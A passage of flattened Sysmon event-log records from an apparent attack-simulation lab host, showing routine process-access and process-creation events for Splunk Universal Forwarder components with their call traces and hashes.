Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4A65A322DBF578B2F3C5E0C8C2C4423,SHA256=F2398114B0DF7E47FEAB5B595F1DC7241D53D97A47F6578515490FF62C153ACE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.304{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:24.289{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.289{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.274{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.976{0C1E0330-F8B5-60EB-EC79-00000000D001}208344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.836{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.836{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program 